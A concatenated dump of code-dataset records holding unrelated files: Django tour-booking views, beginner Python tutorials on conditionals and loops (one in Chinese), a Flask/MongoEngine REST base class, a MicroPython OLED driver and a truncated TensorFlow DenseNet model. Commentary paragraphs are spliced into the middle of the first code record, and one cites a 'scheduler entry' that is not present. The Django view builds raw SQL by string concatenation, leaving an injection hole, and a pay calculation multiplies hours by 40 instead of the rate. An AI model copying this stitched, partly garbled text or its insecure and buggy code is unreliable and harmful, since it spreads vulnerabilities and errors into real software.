sum_price, sum(a.price) as total_price FROM tour_placeTour a inner join tour_tour t on a.tour_id = t.id group by t.id limit 8\"\n tour = Tour.objects.raw(query)\n place_context = Place.objects.all().order_by('-price')[:4]\n\n query_total_accout = (\n \" select *,count(a.accout_id) as countTotal from tour_booktour as\"\n \" a inner join tourer_account as\"\n \" t on a.accout_id = t.id\"\n \" group by a.accout_id\"\n \" order by count(a.accout_id) desc\"\n \" limit 4\"\n )\n booktotal = BookTour.objects.raw(query_total_accout)\n\n if 'account' in request.session:\n idempresa = request.session['account']\n else:\n idempresa=None\n\n if idempresa == None:\n tour_city = Tour.objects.raw(\"SELECT city,id from tour_tour group by city\")\n context = {\n 'context':tour,\n 'idempresa':idempresa,\n 'houses':houses,\n 'tour_city':tour_city,\n 'place_context':place_context,\n 'booktotal':booktotal\n }\n return render(request,'home/home.html',context)\n else:\n account = Account.objects.get(email=idempresa)\n author_account = account.author\n if author_account == 'admin':\n query_details = \"SELECT t.*,b.*,sum(p.price) as total_price,(sum(p.price) * t.person) as sum_price FROM tour_tour t inner join tour_placetour p on t.id=p.tour_id inner join tour_booktour b on b.tour_id = t.id where b.accout_id = '\" + idempresa + \"'\" +\" group by t.id\"\n bookTour = BookTour.objects.raw(query_details)\n tour_city = Tour.objects.raw(\"SELECT city,id from tour_tour group by city\")\n context = {\n 'context':tour,\n 'idempresa':idempresa,\n 'houses':houses,\n 'bookTour':bookTour,\n 'tour_city':tour_city,\n 'admin':'admin',\n 
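
The Scenarios notes in the scheduler entry above reduce to one idempotency rule: a fired task acts only if the stored schedule time has actually passed, and it clears that time so duplicate or stale firings become no-ops. The guard in isolation, with an illustrative stand-in for the Django model:

from datetime import datetime

class Game:
    def __init__(self, when):
        self.start_elimination_time = when  # None once the task has run

def maybe_start(game, now):
    if game.start_elimination_time is None:
        return False  # already handled by an earlier firing
    if now < game.start_elimination_time:
        return False  # schedule was moved later; this firing is too early
    game.start_elimination_time = None  # claim the task exactly once
    return True

g = Game(datetime(2024, 1, 1))
assert maybe_start(g, datetime(2024, 1, 2)) is True
assert maybe_start(g, datetime(2024, 1, 3)) is False  # duplicate firing no-ops
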
'place_context':place_context,\n 'booktotal':booktotal\n }\n return render(request,'home/home.html',context)\n else:\n tour_city = Tour.objects.raw(\"SELECT city,id from tour_tour group by city\")\n context = {\n 'context':tour,\n 'idempresa':idempresa,\n 'houses':houses,\n 'tour_city':tour_city,\n 'place_context':place_context,\n }\n return render(request,'home/home.html',context)\n \n\ndef search_multi(request):\n if request.method == \"POST\":\n city = request.POST.get('city_tour')\n price = request.POST.get('price')\n person = request.POST.get('person')\n date = request.POST.get('date')\n return redirect('/tour/search/' + city + '/' + str(price) + '/' + str(person) + '/' + str(date) + '/')\n else:\n return render(request,'error/index.html',{\n 'error':'wrong routing path'\n })","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90811337","text":"def sampleTest():\n\thoursWorked = 39\n\tsalary = 39000\n\tpassword = \"Guest\"\n\tuPassword = raw_input('Enter password: ')\n\tif(password == uPassword):\n\t\tprint('Access Granted!')\n\telse:\n\t\tprint('Access Denied!')\n\tif(hoursWorked > 40 and salary <= 50000):\n\t\tprint('Kaboom!')\n\telse:\n\t\tprint('Not Kaboom!')\n\ndef simpleIF():\n\t# if relationaexpression: \n\t# \tstatements\n\thoursWorked = int(raw_input('Enter hours worked: '))\n\trate = 25.00\n\tif hoursWorked > 40:\n\t\tgrossPay = (40 * rate ) + ((hoursWorked - 40) * (rate * 1.5))\n\tif hoursWorked <= 40:\n\t\tgrossPay = hoursWorked * 40\n\tprint('Gross Pay: ' + str(grossPay))\n\ndef ELSE():\n\t# if relationalexpression:\n\t# statements: run if true\n\t# else: \n\t# statements: run if false\n\thoursWorked = int(raw_input('Enter hours worked: '))\n\trate = 25.00\n\tif hoursWorked > 40:\n\t\tgrossPay = (40 * rate ) + ((hoursWorked - 40) * (rate * 1.5))\n\telse:\n\t\tgrossPay = hoursWorked * 40\n\tprint('Gross Pay: ' + str(grossPay))\n\ndef ifELIF():\n\t# if relationalexpression:\t\n\t# statements: run if true\n\t# elif relationalexpression2:\n\t# statements: run if true\n\t# else: \n\t# statements: run if all else is false\n\tgrade = int(raw_input('Enter numeric grade: '))\n\tletterGrade = ''\n\tif grade >= 89:\n\t\tletterGrade = 'A'\n\telif grade >= 80:\n\t\tletterGrade = 'B'\n\telif grade >= 79:\n\t\tletterGrade = 'C'\n\telif grade >= 69:\n\t\tletterGrade = 'D'\n\telse:\n\t\tletterGrade = 'F'\n\n\tprint(str(grade) + ' Letter Grade: ' + letterGrade) \n\ndef guessingGame():\n\tanswer = \"Watson\"\n\tprint('Here is a guessing game. You get three tries!')\n\tresponse = raw_input('What is the name of the computer that played on Jeopardy? ')\n\tif answer == response:\n\t\tprint('That is right!')\n\telse:\n\t\tresponse = raw_input('Sorry. Guess again: ')\n\t\tif answer == response:\n\t\t\tprint('That is right!')\n\t\telse:\n\t\t\tresponse = raw_input('Sorry. Guess again! 
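
The home view above splices idempresa, a session-supplied value, straight into a raw SQL string, which is an injection risk; Django's Manager.raw() accepts a params list for exactly this case (e.g. BookTour.objects.raw(query, [idempresa]) with %s in place of the concatenation). The binding mechanism itself, shown self-contained with sqlite3:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE booktour (accout_id TEXT)")
conn.execute("INSERT INTO booktour VALUES ('a@b.c')")

accout_id = "a@b.c"  # user-supplied value: bind it, never concatenate it
rows = conn.execute(
    "SELECT * FROM booktour WHERE accout_id = ?", (accout_id,)
).fetchall()
assert rows == [("a@b.c",)]
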
(Last Chance): ')\n\t\t\tif answer == response:\n\t\t\t\tprint('That is right!')\n\t\t\telse:\n\t\t\t\tprint('You failed all three times!')\n\t\t\t\tprint('The answer is ' + answer)\n\ndef findActivity():\n\tmessage = 'The recommended activity is '\n\ttemp = int(raw_input('Enter the temperature: '))\n\tif temp > 85: \n\t\tmessage = message + 'swimming'\n\telif temp >= 70:\n\t\tmessage = message + 'tennis'\n\telif temp >= 32:\n\t\tmessage = message + 'golf'\n\telif temp >= 0:\n\t\tmessage = message + 'dancing'\n\telse:\n\t\tmessage = message + 'sitting by the fire' \n\n\tprint(message)\ndef main():\n\t# sampleTest()\n\t# simpleIF()\n\t# ELSE()\n\t# ifELIF()\n\t# guessingGame()\n\tfindActivity()\n\nmain()","sub_path":"other/Decisions.py","file_name":"Decisions.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"160345900","text":"from django.shortcuts import render\nfrom .models import Project,Person,autority,indic\nfrom django.http import HttpResponseRedirect\nfrom random import randint\n# Create your views here.\n\ndef mainpage(request):\n if \"email\" in request.session:\n person=Person.objects.get(email=request.session[\"email\"])\n yetki=autority.objects.all()\n projects=Project.objects.all()\n content={\"projects\":projects,\"person\":person,\"yetki\":yetki}\n return render(request,\"dashboard.html\",content)\n\n else:\n return HttpResponseRedirect('/giris/')\n\n\ndef projectdetail(request,project_slug):\n if \"email\" in request.session:\n person=Person.objects.get(email=request.session[\"email\"])\n yetki=autority.objects.all()\n projects=Project.objects.all()\n say1 = randint(600, 1500)\n say2 = randint(600, 1500)\n say3 = randint(600, 1500)\n proje=Project.objects.get(slug=project_slug)\n indikator=indic.objects.filter(proje=proje)\n\n content={\"projects\":projects,\"person\":person,\"yetki\":yetki,\"proje\":proje,\"say1\":say1,\"say2\":say2,\"say3\":say3,\"indikator\":indikator}\n return render(request,\"proje.html\",content)\n\n else:\n return HttpResponseRedirect('/giris/')\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438214114","text":"import echo\nimport unittest\n\n\nclass MockInterface(object):\n\n\tdef __init__(self):\n\t\tself.player_messages = []\n\n\tdef player_message(self, player, message):\n\t\tself.player_messages.append({\n\t\t\t'player': player,\n\t\t\t'message': message,\n\t\t})\n\n\nclass TestEchoExample(unittest.TestCase):\n\n\tdef should_message_player_with_joined_arguments_of_command(self):\n\t\t# set up the test\n\t\tinterface = MockInterface()\n\t\thandler = echo.EchoCommandHandler(interface)\n\t\tplayer = object()\n\n\t\t# perform some action\n\t\thandler.handle_command(player, 'echo', ['a', 'b', 'c'])\n\n\t\t# validate the resulting output\n\t\tself.assertEqual(1, len(interface.player_messages))\n\t\tself.assert_(interface.player_messages[0]['player'] is player)\n\t\tself.assertEqual('a b c', interface.player_messages[0]['message'])\n","sub_path":"tests/unit/test_echo.py","file_name":"test_echo.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"333662653","text":"import traceback\nfrom datetime import datetime\n\nfrom flask import request\nfrom mongoengine import DoesNotExist, NotUniqueError, 
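
simpleIF and ELSE in the Decisions entry above compute grossPay = hoursWorked * 40 in the no-overtime branch, multiplying hours by the constant 40 instead of by rate. The calculation both functions describe, corrected (rate defaults to the entry's 25.00):

def gross_pay(hours_worked, rate=25.0):
    if hours_worked > 40:
        # First 40 hours at the base rate, the rest at time and a half.
        return 40 * rate + (hours_worked - 40) * rate * 1.5
    return hours_worked * rate

assert gross_pay(40) == 1000.0
assert gross_pay(42) == 1075.0
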
ValidationError\n\nfrom flask_restful import Resource\nfrom src import Msg\nfrom src.commons.logger import logger\nfrom src.commons.utils import Schema, validate_schema\n\nmongo_filter_op_map = {\n \">\": \"__gt\",\n \"<\": \"__lt\",\n \">=\": \"__gte\",\n \"<=\": \"__lte\",\n \"!=\": \"__ne\",\n \"==\": \"\",\n \"contains\": \"contains\",\n}\n\n\ndef move_space(data: dict):\n if data:\n for k, v in data.items():\n if isinstance(v, str):\n data[k] = str.strip(v)\n return data\n return {}\n\n\nclass BaseResource(Resource):\n validate_data = None\n validate_schemas = {}\n\n def dispatch_request(self, *args, **kwargs):\n req = None\n schema = None\n if request.method == \"GET\":\n schema = self.validate_schemas.get(\"get\")\n req = request.args.to_dict()\n else:\n schema = self.validate_schemas.get(request.method.lower())\n req = request.json\n if isinstance(schema, Schema):\n data, errors = validate_schema(schema, move_space(req))\n if errors:\n logger.info(str(errors))\n return str(errors), 400\n self.validate_data = data\n try:\n ret = super().dispatch_request(*args, **kwargs)\n return ret\n except NotUniqueError:\n logger.warn(traceback.format_exc())\n return Msg.DATA_EXIST, 400\n except ValidationError as e:\n logger.warn(traceback.format_exc())\n return str(e), 400\n except DoesNotExist:\n logger.warn(traceback.format_exc())\n return Msg.NO_DATA, 400\n except AttributeError as e:\n logger.warn(traceback.format_exc())\n return str(e), 400\n except Exception as e:\n logger.warn(traceback.format_exc())\n return str(e), 400\n\n\nclass MongoModelResource(BaseResource):\n model = None\n args_schema = None\n list_schema = None\n detail_schema = None\n allow_methods = [\"get\", \"post\", \"put\", \"delete\"]\n update_exclude_fields = []\n update_include_fields = []\n list_fields = []\n detail_fields = []\n filter_fields = []\n max_page_size = 100\n default_page_size = 10\n allow_query_all = False\n\n def get_conditions(self):\n filter_conditions = {}\n for filter_field in self.filter_fields:\n column, op, field, convert_fn = filter_field\n value = request.args.get(field)\n if value:\n try:\n if convert_fn.__name__ == 'bool':\n if value == \"true\":\n value = True\n else:\n value = False\n value = convert_fn(value)\n except:\n return (\n \"Cannot convert field {} into {}\".format(\n field, convert_fn.__name__\n ),\n 400,\n )\n operator = mongo_filter_op_map[op]\n filter_conditions[\n \"{column}{operator}\".format(column=column, operator=operator)\n ] = value\n return filter_conditions\n\n def get_queryset(self):\n filter_conditions = self.get_conditions()\n queryset = self.model.objects.only(*self.list_fields).filter(**filter_conditions)\n return queryset\n\n def dispatch_request(self, *args, **kwargs):\n if request.method.lower() not in self.allow_methods:\n return Msg.REQUEST_ERROR, 405\n return super().dispatch_request(*args, **kwargs)\n\n def get(self):\n if request.args.get(\"id\"):\n instance = (\n self.model.objects\n .only(*self.detail_fields)\n .filter(id=request.args.get(\"id\"))\n .first()\n )\n return instance.to_dict()\n try:\n page = request.args.get(\"page\")\n if page:\n page = int(page)\n else:\n page = 1\n except Exception:\n return \"page should be int\", 400\n try:\n page_size = request.args.get(\"page_size\")\n if page_size:\n page_size = int(page_size)\n else:\n page_size = self.default_page_size\n if page_size > self.max_page_size:\n page_size = self.default_page_size\n except Exception:\n return \"page_size should be int\", 400\n queryset = self.get_queryset()\n if 
self.allow_query_all and page_size == -1:\n page_size = queryset.count()\n pagination = queryset.paginate(page=page, per_page=page_size)\n return {\n \"total\": pagination.total,\n \"pages\": pagination.pages,\n \"page\": pagination.page,\n \"page_size\": pagination.per_page,\n \"results\": [obj.to_dict() for obj in pagination.items],\n }\n\n def post(self):\n instance = self.model(**request.json)\n instance.save()\n return instance.to_dict()\n\n def put(self):\n _id = request.json.pop(\"id\")\n instance = self.model.objects().filter(id=_id).first()\n if not instance:\n return Msg.NO_DATA, 400\n exclude_fields = set(request.json.keys()) & set(self.update_exclude_fields)\n include_fields = set(request.json.keys()) - set(self.update_include_fields)\n if self.update_include_fields and include_fields:\n logger.info(\"Not Allowed To Update \" + str(include_fields))\n return \"Not allowed to update \" + str(include_fields), 400\n if exclude_fields:\n logger.info(\"Not Allowed To Update \" + str(exclude_fields))\n return \"Not allowed to update \" + str(exclude_fields), 400\n\n instance.update_time = datetime.utcnow()\n instance.update(**request.json)\n instance.save()\n\n def delete(self):\n instance = self.model.objects().filter(id=request.json.get(\"id\")).first()\n if not instance:\n return Msg.NO_DATA, 400\n instance.delete()\n","sub_path":"xxw/fraud_api/src/commons/model_resource.py","file_name":"model_resource.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"96579004","text":"'''\r\n2.4.time模块的初体验\r\n\r\nsleep(sec)函数:程序一旦执行到sleep()函数,会立即休眠sec秒,等到时间到了,自动醒过来,然后继续往下执行...\r\n\r\n思路步骤:\r\n\r\n第一步:导入time模块 import time\r\n\r\n第二步:time模块名调用sleep(sec)执行让程序休眠sec秒 time.sleep(5)\r\n\r\n2.5.break&continue关键字\r\n\r\n对于break关键字而言,在循环中一旦遇到了break关键字,立即结束当前循环\r\n\r\n对于continue关键字而言,在循环中一旦遇到了continue关键字,立即结束当次循环,开始下一次循环\r\n\r\n案例:\r\n'''\r\n#演示brak和continue关键字的使用:\r\n# i=1\r\n# while i<11:\r\n# if i==5:\r\n# i+=1\r\n# break\r\n #continue\r\n #和break continue在同一作用范围内,它们的后面不应该定义代码的代码,因为永远不可能被执行到。\r\n #i+=1\r\n # print(i)\r\n # i+=1\r\n# print('-'*8)\r\n\r\n'''\r\n需求:打印1~100的奇数,个数和总和\r\n使用continue关键字参与来实现\r\n'''\r\n# i=1\r\n# while i<= 100:\r\n# if i%2==0:\r\n# i+=1\r\n# continue\r\n# print(i)\r\n# i+=1\r\n\r\n'''\r\n2.6.else语句配合循环使用\r\n\r\n格式:\r\n\r\nelse:\r\n\r\n语句块\r\n\r\n【注意事项】\r\n\r\n如果循环是正常终止,那么else中的语句块一定会被执行\r\n\r\n如果循环��由于break关键字而终止,那么else中的语句块就不会被执行\r\n\r\n案例:\r\n'''\r\n#演示else语句配合循环使用\r\ni=1\r\nwhile i<=10:\r\n if i==5:\r\n break\r\n print(i)\r\n i+=1\r\nelse:\r\n print('只要不碰到牛逼break,我就会被执行...')","sub_path":"第6-10课/python第十课——循环结构收尾.py","file_name":"python第十课——循环结构收尾.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289637260","text":"from machine import Pin, PWM, Timer, I2C, reset\nfrom micropython import const\nimport framebuf\nimport ujson\n\n# How to use this\n# 1. Flash MicroPython on the board\n# 2. ampy -p /dev/ttyUSB0 put main.py\n# 3. 
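
MongoModelResource above turns (column, op, query_param, convert_fn) tuples into mongoengine keyword filters via mongo_filter_op_map; note that its "contains" entry maps to "contains" without the leading double underscore, so formatting "{column}{operator}" yields e.g. namecontains rather than name__contains. The mechanism in isolation, with the suffix spelled out and illustrative names:

op_map = {">": "__gt", "<": "__lt", ">=": "__gte",
          "<=": "__lte", "!=": "__ne", "==": "", "contains": "__contains"}

def build_conditions(filters, args):
    # filters: (column, op, query_param, convert_fn) tuples; args: the raw
    # query-string dict. Missing parameters are simply skipped.
    conditions = {}
    for column, op, field, convert in filters:
        value = args.get(field)
        if value is not None:
            conditions["{}{}".format(column, op_map[op])] = convert(value)
    return conditions

cond = build_conditions([("age", ">=", "min_age", int)], {"min_age": "21"})
assert cond == {"age__gte": 21}  # ready for Model.objects.filter(**cond)
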
Reset the device\n\n# register definitions\nSET_CONTRAST = const(0x81)\nSET_ENTIRE_ON = const(0xa4)\nSET_NORM_INV = const(0xa6)\nSET_DISP = const(0xae)\nSET_MEM_ADDR = const(0x20)\nSET_COL_ADDR = const(0x21)\nSET_PAGE_ADDR = const(0x22)\nSET_DISP_START_LINE = const(0x40)\nSET_SEG_REMAP = const(0xa0)\nSET_MUX_RATIO = const(0xa8)\nSET_COM_OUT_DIR = const(0xc0)\nSET_DISP_OFFSET = const(0xd3)\nSET_COM_PIN_CFG = const(0xda)\nSET_DISP_CLK_DIV = const(0xd5)\nSET_PRECHARGE = const(0xd9)\nSET_VCOM_DESEL = const(0xdb)\nSET_CHARGE_PUMP = const(0x8d)\n\n\nclass SSD1306:\n def __init__(self, width, height, external_vcc):\n self.width = width\n self.height = height\n self.external_vcc = external_vcc\n self.pages = self.height // 8\n self.buffer = bytearray(self.pages * self.width)\n fb = framebuf.FrameBuffer(self.buffer, self.width, self.height, framebuf.MONO_VLSB)\n self.framebuf = fb\n # Provide methods for accessing FrameBuffer graphics primitives. This is a\n # workround because inheritance from a native class is currently unsupported.\n # http://docs.micropython.org/en/latest/pyboard/library/framebuf.html\n self.fill = fb.fill\n self.pixel = fb.pixel\n self.hline = fb.hline\n self.vline = fb.vline\n self.line = fb.line\n self.rect = fb.rect\n self.fill_rect = fb.fill_rect\n self.text = fb.text\n self.scroll = fb.scroll\n self.blit = fb.blit\n self.init_display()\n\n def init_display(self):\n for cmd in (\n SET_DISP | 0x00, # off\n # address setting\n SET_MEM_ADDR, 0x00, # horizontal\n # resolution and layout\n SET_DISP_START_LINE | 0x00,\n SET_SEG_REMAP | 0x01, # column addr 127 mapped to SEG0\n SET_MUX_RATIO, self.height - 1,\n SET_COM_OUT_DIR | 0x08, # scan from COM[N] to COM0\n SET_DISP_OFFSET, 0x00,\n SET_COM_PIN_CFG, 0x02 if self.height == 32 else 0x12,\n # timing and driving scheme\n SET_DISP_CLK_DIV, 0x80,\n SET_PRECHARGE, 0x22 if self.external_vcc else 0xf1,\n SET_VCOM_DESEL, 0x30, # 0.83*Vcc\n # display\n SET_CONTRAST, 0xff, # maximum\n SET_ENTIRE_ON, # output follows RAM contents\n SET_NORM_INV, # not inverted\n # charge pump\n SET_CHARGE_PUMP, 0x10 if self.external_vcc else 0x14,\n SET_DISP | 0x01): # on\n self.write_cmd(cmd)\n self.fill(0)\n self.show()\n\n def poweroff(self):\n self.write_cmd(SET_DISP | 0x00)\n\n def poweron(self):\n self.write_cmd(SET_DISP | 0x01)\n\n def contrast(self, contrast):\n self.write_cmd(SET_CONTRAST)\n self.write_cmd(contrast)\n\n def invert(self, invert):\n self.write_cmd(SET_NORM_INV | (invert & 1))\n\n def show(self):\n x0 = 0\n x1 = self.width - 1\n if self.width == 64:\n # displays with width of 64 pixels are shifted by 32\n x0 += 32\n x1 += 32\n self.write_cmd(SET_COL_ADDR)\n self.write_cmd(x0)\n self.write_cmd(x1)\n self.write_cmd(SET_PAGE_ADDR)\n self.write_cmd(0)\n self.write_cmd(self.pages - 1)\n self.write_data(self.buffer)\n\n\nclass SSD1306_I2C(SSD1306):\n def __init__(self, width, height, i2c, addr=0x3c, external_vcc=False):\n self.i2c = i2c\n self.addr = addr\n self.temp = bytearray(2)\n super().__init__(width, height, external_vcc)\n\n def write_cmd(self, cmd):\n self.temp[0] = 0x80 # Co=1, D/C#=0\n self.temp[1] = cmd\n self.i2c.writeto(self.addr, self.temp)\n\n def write_data(self, buf):\n self.temp[0] = self.addr << 1\n self.temp[1] = 0x40 # Co=0, D/C#=1\n self.i2c.start()\n self.i2c.write(self.temp)\n self.i2c.write(buf)\n self.i2c.stop()\n\n\ni2c = I2C(-1, Pin(4), Pin(5), freq=400000) # Bitbanged I2C bus\nassert 60 in i2c.scan(), \"No OLED display detected!\"\noled = SSD1306_I2C(128, 64, i2c)\noled.invert(0) # White text on black 
background\noled.contrast(255) # Maximum contrast\noled.fill(0)\noled.show()\n\n##############\nflip = 0\ndata = []\nlogo = (\n \"\\ ||||__ o\",\n \"| \\_/ o \\ o\",\n \"> _ (( <_ o\",\n \"| / \\__+___/\",\n \"|/ |/\",\n \"\",\n \"Sick fish hackin\",\n)\nplaceholder_data = [logo]\nconfig = {\n 'field_id': 'B',\n 'gameplay status': 'disabled',\n 'robot_id': 'A',\n 'target goal color': 'purple',\n}\n\nconfig_json = ujson.dumps(config)\nconfig_package = \"!@#$%s!@#$\" % config_json\n\nfield_jumper = Pin(15, Pin.IN, Pin.PULL_UP)\ngoal_jumper = Pin(13, Pin.IN, Pin.PULL_UP)\nrobot_jumper = Pin(12, Pin.IN, Pin.PULL_UP)\n\n\ndef refresh_config():\n global config, config_json, config_package\n\n config = {\n 'field_id': 'A' if field_jumper.value() else 'B',\n 'gameplay status': 'disabled',\n 'robot_id': 'A' if robot_jumper.value() else 'B',\n 'target goal color': 'blue' if goal_jumper.value() else 'purple',\n }\n\n config_json = ujson.dumps(config)\n config_package = \"!@#$%s!@#$\" % config_json\n\n\ndef render(*_, extra=None):\n global flip, placeholder_data\n\n to_show = data or placeholder_data\n flip = (flip + 1) % len(to_show)\n\n refresh_config()\n\n oled.fill(0)\n\n for i, row in enumerate(to_show[flip]):\n oled.text(row, 0, 8 * i)\n\n if extra:\n oled.text(extra, 0, 8 * (i + 2))\n\n oled.show()\n\n placeholder_data = [\n tuple(\n '{:<8}: {}'.format(k[:8], v) for k, v in config.items()\n )\n ]\n\n\nrender()\n\ntimer_redraw = Timer(1)\ntimer_redraw.init(period=2000, mode=Timer.PERIODIC, callback=render)\n\n\n# if no machine input, kill oled screen, as it blocks flashing\ndef kill(*t):\n global data\n if not data:\n timer_redraw.deinit()\n render(extra=\"FLASHING ALLOW\")\n\n\ntimer_kill = Timer(2)\ntimer_kill.init(period=10000, mode=Timer.ONE_SHOT, callback=kill)\n","sub_path":"notfirmata/esp8266/screen/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"269935942","text":"\"\"\"Contains a variant of the densenet model definition.\n\nImplement two kinds of networks accoring to Densely Connected Convolutional Networks.\n\nThe value of the parameter database_name of the function densenet determines which network is used.\n\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nslim = tf.contrib.slim\n\n\ndef trunc_normal(stddev): return tf.truncated_normal_initializer(stddev=stddev)\n\n\ndef bn_act_conv_drp(current, num_outputs, kernel_size, scope='block'):\n current = slim.batch_norm(current, scope=scope + '_bn')\n current = tf.nn.relu(current)\n current = slim.conv2d(current, num_outputs, kernel_size, scope=scope + '_conv')\n current = slim.dropout(current, scope=scope + '_dropout')\n return current\n\n\n# add a parameter \"bottleneck\" in this function\ndef block(net, layers, growth, bottleneck, scope='block'):\n \n idx = 1\n while idx <= layers :\n \n if bottleneck :\n bnet = bn_act_conv_drp(net, 4 * growth, [1, 1],\n scope=scope + '_conv1x1_' + str(idx))\n idx = idx + 1\n else : \n bnet = net \n \n tmp = bn_act_conv_drp(bnet, growth, [3, 3],\n scope=scope + '_conv3x3_' + str(idx))\n idx = idx + 1\n \n net = tf.concat(axis=3, values=[net, tmp])\n return net\n\n\n\n# add parameters : dataset_name, bottleneck, compression and so on\ndef densenet(images,\n num_classes=1001, is_training=True, \n dataset_name = 'imagenet', layer = 32, \n bottleneck=True, compression=True,\n\t 
compression_rate = 0.5, \n growth = 24, \n dropout_keep_prob=0.8, \n scope='densenet'):\n \"\"\"Creates a variant of the densenet model.\n\n images: A batch of `Tensors` of size [batch_size, height, width, channels].\n num_classes: the number of classes in the dataset.\n is_training: specifies whether or not we're currently training the model.\n This variable will determine the behaviour of the dropout layer.\n dataset_name: set it to 'imagenet' if you want to use the network for imagenet, otherwise set it to a name that is not 'imagenet'.\n layer: the number of layers in every dense block of the network that is not for imagenet.\n bottleneck: specifies whether or not including bottleneck layers in our network.\n compression: specifies whether or not reducing the number of feature-maps at transition layer.\n compression_rate: specifies the compression factor when compression is True, 0 < compression_rate <= 1\n growth: The number of feature maps each layer (except bottleneck layers) produces in every dense block.\n dropout_keep_prob: the percentage of activation values that are retained.\n scope: Optional variable_scope.\n \n Returns:\n logits: the pre-softmax activations, a tensor of size\n [batch_size, `num_classes`]\n end_points: a dictionary from components of the network to the corresponding\n activation.\n \"\"\"\n #growth = 24\n #compression_rate = 0.5\n\n def reduce_dim(input_feature):\n return int(int(input_feature.shape[-1]) * compression_rate)\n\n end_points = {}\n\n with tf.variable_scope(scope, 'DenseNet', [images, num_classes]):\n with slim.arg_scope(bn_drp_scope(is_training=is_training,\n keep_prob=dropout_keep_prob)) as ssc:\n \n # My code goes here. And several input parameters are added.\n # There are also changes in other functions, like bn_act_conv_drp and block\n ###########This is the start line of my code###############\n \n with slim.arg_scope(densenet_arg_scope(weight_decay=0.0001)) as sc:\n \n if dataset_name == \"imagenet\" :\n # Hopefully debug it later.\n # Before Dense Block 1 : 56 x 56 x 2*growth \n end_point = 'input'\n net = slim.conv2d(images, 2*growth, [7, 7], stride=2, scope=end_point+'_conv_7')\n net = slim.max_pool2d(net, [3, 3], stride=2, scope=end_point+'_pool_2')\n end_points[end_point] = net\n \n # Dense Block 1 : 56 x 56 x growth \n end_point = 'block1' \n net = block(net, 12, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 1 : 56 x 56 x growth or growth*compression_rate if compression is True \n end_point = 'convolution1'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 1 : 28 x 28 x growth or growth*compression_rate if compression is True \n end_point = 'pool1'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 2 : 28 x 28 x growth \n end_point = 'block2' \n net = block(net, 24, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 2 : 28 x 28 x growth or growth*compression_rate if compression is True \n end_point = 'convolution2'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 2 : 14 x 14 x growth or growth*compression_rate if compression is True \n end_point = 'pool2'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n 
\n # Dense Block 3 : 14 x 14 x growth \n end_point = 'block3' \n net = block(net, 48, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 3 : 14 x 14 x growth or growth*compression_rate if compression is True \n end_point = 'convolution3'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 3 : 7 x 7 x growth or growth*compression_rate if compression is True \n end_point = 'pool3'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 4 : 7 x 7 x growth \n end_point = 'block4' \n net = block(net, 48, growth, bottleneck, scope=end_point)\n end_points[end_point] = net \n \n else :\n # Before Dense Block 1 : 32 x 32 x 16\n end_point = 'input'\n net = slim.conv2d(images, 16, [7, 7], stride=2, scope=end_point+'_conv_7')\n net = slim.max_pool2d(net, [3, 3], stride=2, scope=end_point+'_pool_2')\n net = slim.repeat(net, 12, slim.conv2d, 16, [3, 3], scope=end_point)\n\n end_points[end_point] = net\n \n # Dense Block 1 : 32 x 32 x growth \n end_point = 'block1' \n net = block(net, layer, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 1 : 32 x 32 x growth or growth*compression_rate if compression is True \n end_point = 'convolution1'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 1 : 16 x 16 x growth or growth*compression_rate if compression is True \n end_point = 'pool1'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 2 : 16 x 16 x growth \n end_point = 'block2' \n net = block(net, layer, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Convolution 2 : 16 x 16 x growth or growth*compression_rate if compression is True \n end_point = 'convolution2'\n \n if compression :\n num_outputs = reduce_dim(net)\n \n net = bn_act_conv_drp(net, num_outputs, [1, 1], scope=end_point)\n end_points[end_point] = net\n \n # Average Pooling 2 : 8 x 8 x growth or growth*compression_rate if compression is True \n end_point = 'pool2'\n net = slim.avg_pool2d(net, [2, 2], stride=2, scope=end_point)\n end_points[end_point] = net\n \n # Dense Block 3 : 8 x 8 x growth \n end_point = 'block3' \n net = block(net, layer, growth, bottleneck, scope=end_point)\n end_points[end_point] = net\n\n # Last Convolution 